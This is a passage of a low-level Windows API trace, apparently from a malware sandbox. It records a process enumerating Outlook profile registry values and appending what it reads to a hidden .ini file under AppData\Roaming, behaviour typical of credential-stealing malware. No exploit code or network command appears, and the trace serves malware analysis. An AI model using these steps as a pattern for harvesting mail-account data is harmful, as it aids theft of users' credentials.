BaseAddress=0x5b3710) returned 1 [0279.727] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.727] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1a, ByteOffset=0xdd5fc*=220, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.727] NtClose (Handle=0x364) returned 0x0 [0279.728] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.728] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.728] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3710) returned 1 [0279.728] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.728] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x12, ByteOffset=0xdd5fc*=246, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.729] NtClose (Handle=0x364) returned 0x0 [0279.730] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.730] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.730] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.730] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0279.730] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.730] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1c, ByteOffset=0xdd5fc*=264, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.730] NtClose (Handle=0x364) returned 0x0 [0279.752] RtlIntegerToChar (in: Value=0x2, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="2") returned 0x0 [0279.753] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.753] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.753] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3358) returned 1 [0279.753] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.753] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x6, ByteOffset=0xdd5fc*=292, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.754] NtClose (Handle=0x364) returned 0x0 [0279.757] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.757] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.757] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.757] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b30b0) returned 1 [0279.757] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.757] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1a, ByteOffset=0xdd5fc*=298, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.758] NtClose (Handle=0x364) returned 0x0 [0279.763] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.763] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.763] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3028) returned 1 [0279.763] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.763] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x2e, ByteOffset=0xdd5fc*=324, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.764] NtClose (Handle=0x364) returned 0x0 [0279.765] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.765] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.765] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.766] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.766] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.766] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x20, ByteOffset=0xdd5fc*=370, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.766] NtClose (Handle=0x364) returned 0x0 [0279.767] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.767] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.768] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0279.768] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.768] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x14, ByteOffset=0xdd5fc*=402, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.768] NtClose (Handle=0x364) returned 0x0 [0279.773] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x8000001a [0279.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd71c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.773] NtCreateFile (in: FileHandle=0xdd73c, DesiredAccess=0x12019f, ObjectAttributes=0xdd704*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd724, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd73c*=0x364, IoStatusBlock=0xdd724*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.773] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3248) returned 1 [0279.773] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd724, FileInformation=0xdd67c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd724, FileInformation=0xdd67c) returned 0x0 [0279.773] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd724, Buffer=0x58c868*, Length=0x4, ByteOffset=0xdd694*=422, Key=0x0 | out: IoStatusBlock=0xdd724, Buffer=0x58c868*) returned 0x0 [0279.774] NtClose (Handle=0x364) returned 0x0 [0279.777] NtClose (Handle=0x254) returned 0x0 [0279.777] NtEnumerateKey (in: KeyHandle=0x250, Index=0x1, KeyInformationClass=0x0, KeyInformation=0xddb7c, Length=0x400, ResultLength=0xde3d8 | out: KeyInformation=0xddb7c, ResultLength=0xde3d8) returned 0x0 [0279.777] NtCreateKey (in: KeyHandle=0xde3cc, DesiredAccess=0x20219, ObjectAttributes=0xdd734*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde3cc*=0x254) returned 0x0 [0279.777] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.777] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.777] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.778] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0279.778] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.778] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0xc, ByteOffset=0xdd5fc*=426, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.778] NtClose (Handle=0x364) returned 0x0 [0279.780] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.780] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.781] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b3600) returned 1 [0279.781] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.781] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x52, ByteOffset=0xdd5fc*=438, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.781] NtClose (Handle=0x364) returned 0x0 [0279.785] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.785] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.785] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.785] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b33e0) returned 1 [0279.785] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.785] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x12, ByteOffset=0xdd5fc*=520, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.787] NtClose (Handle=0x364) returned 0x0 [0279.807] RtlIntegerToChar (in: Value=0xd84397d8, Base=0x0, Length=0x20, String=0xdd6e4 | out: String="3628308440") returned 0x0 [0279.807] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.807] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.808] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.808] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.808] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x18, ByteOffset=0xdd5fc*=538, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.808] NtClose (Handle=0x364) returned 0x0 [0279.815] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.815] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.815] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.815] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b2e08) returned 1 [0279.815] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.815] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x1a, ByteOffset=0xdd5fc*=562, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.816] NtClose (Handle=0x364) returned 0x0 [0279.821] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0279.821] NtCreateFile (in: FileHandle=0xdd6a4, DesiredAccess=0x12019f, ObjectAttributes=0xdd66c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd68c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd6a4*=0x364, IoStatusBlock=0xdd68c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0279.821] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5b39b8) returned 1 [0279.821] NtQueryInformationFile (in: FileHandle=0x364, IoStatusBlock=0xdd68c, FileInformation=0xdd5e4, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdd68c, FileInformation=0xdd5e4) returned 0x0 [0279.821] NtWriteFile (in: FileHandle=0x364, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xdd68c, Buffer=0x58c868*, Length=0x22, ByteOffset=0xdd5fc*=588, Key=0x0 | out: IoStatusBlock=0xdd68c, Buffer=0x58c868*) returned 0x0 [0279.821] NtClose (Handle=0x364) returned 0x0 [0279.823] NtEnumerateValueKey (in: KeyHandle=0x254, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0xdd77c, Length=0x400, ResultLength=0xde3d8 | out: KeyValueInformation=0xdd77c, ResultLength=0xde3d8) returned 0x0 [0279.823] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0xdd684, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 